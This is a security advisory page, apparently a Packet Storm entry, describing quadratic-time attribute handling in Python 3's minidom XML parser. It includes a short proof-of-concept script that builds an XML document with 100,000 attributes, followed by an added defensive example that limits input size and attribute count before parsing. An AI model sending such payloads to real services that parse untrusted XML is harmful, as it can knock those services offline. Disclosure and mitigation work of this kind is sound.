
📄 Python 3 Minidom Denial of Service

🗓️ 17 Feb 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news | 👁 112 Views

Parsing XML that carries a very large number of attributes with Python 3's minidom can cause CPU exhaustion and Denial of Service when the XML is untrusted.

Code
    =============================================================================================================================================
    | # Title     : python3 minidom Algorithmic Denial of Service (DoS) via Excessive XML Attributes                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://www.python.org/                                                                                                     |
    =============================================================================================================================================
    
    
    [+] Summary    : This proof of concept demonstrates an Algorithmic Denial of Service (Algo-DoS) condition caused by parsing an XML document containing an extremely
                     large number of attributes using Python’s xml.dom.minidom library. Due to inefficient attribute handling with quadratic time complexity, the XML parser may
                     consume excessive CPU resources, leading to severe performance degradation or service unavailability. The issue becomes critical when untrusted XML input is
                     processed without proper size limits or resource controls.
                     This behavior does not result in code execution but represents a significant availability risk for applications relying on vulnerable XML parsing mechanisms.
      
    [+] POC :   
    
    import xml.dom.minidom
    import time

    def trigger_dos_vulnerability():
        # Number of attributes placed on the single root element.
        count = 100000
        # One self-closing <root> element with `count` distinct attributes.
        payload = '<?xml version="1.0"?><root ' + ' '.join([f'attr{i}="v"' for i in range(count)]) + ' />'
        print(f"[*] Attempting to process {count} attributes...")
        # Measure how long minidom takes to build the DOM for this document.
        start_time = time.time()
        try:
            xml.dom.minidom.parseString(payload)
            end_time = time.time()
            print(f"[+] Processing completed successfully in {end_time - start_time:.2f} seconds.")
            print("[!] The system might not be vulnerable, or the input is insufficient for a crash.")
        except Exception as e:
            print(f"[-] An error occurred during processing: {e}")

    if __name__ == "__main__":
        trigger_dos_vulnerability()


    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================
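The summary names missing size limits and resource controls as what makes this critical. The following is an added example, not part of the original advisory or of Python's own code: a pre-parse guard that rejects oversized input and attribute-heavy elements with one expat pass before minidom builds a DOM. The limit values and the names `check_xml_limits`, `parse_untrusted`, `XMLLimitExceeded` and `make_doc` are assumptions chosen for illustration.

```python
import xml.dom.minidom
import xml.parsers.expat

# Assumed limits for illustration; tune them to the documents you expect.
MAX_INPUT_BYTES = 1_000_000
MAX_ATTRS_PER_ELEMENT = 256


class XMLLimitExceeded(ValueError):
    """Raised when untrusted XML exceeds a configured limit."""


def check_xml_limits(data: bytes,
                     max_bytes: int = MAX_INPUT_BYTES,
                     max_attrs: int = MAX_ATTRS_PER_ELEMENT) -> None:
    """Reject oversized input or any element carrying too many attributes."""
    if len(data) > max_bytes:
        raise XMLLimitExceeded(f"input is {len(data)} bytes, limit {max_bytes}")

    parser = xml.parsers.expat.ParserCreate()
    # Deliver attributes as a flat [name, value, name, value, ...] list.
    parser.ordered_attributes = True

    def on_start(name, attrs):
        n = len(attrs) // 2
        if n > max_attrs:
            # An exception raised in a handler aborts Parse() and propagates.
            raise XMLLimitExceeded(f"<{name}> has {n} attributes, limit {max_attrs}")

    parser.StartElementHandler = on_start
    parser.Parse(data, True)


def parse_untrusted(data: bytes) -> xml.dom.minidom.Document:
    """Run the limit check, then build the DOM with minidom."""
    check_xml_limits(data)
    return xml.dom.minidom.parseString(data)


def make_doc(n: int) -> bytes:
    """Constructed sample input: a root element with n attributes."""
    attrs = " ".join(f'a{i}="v"' for i in range(n))
    return f'<?xml version="1.0"?><root {attrs} />'.encode()
```

The attribute check fires only after expat has read the whole start tag, so the byte limit is what bounds the cost of that first pass. Malformed input still raises `xml.parsers.expat.ExpatError`, as it would from minidom itself.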

Vulners AI Score: 6.2 (Medium risk)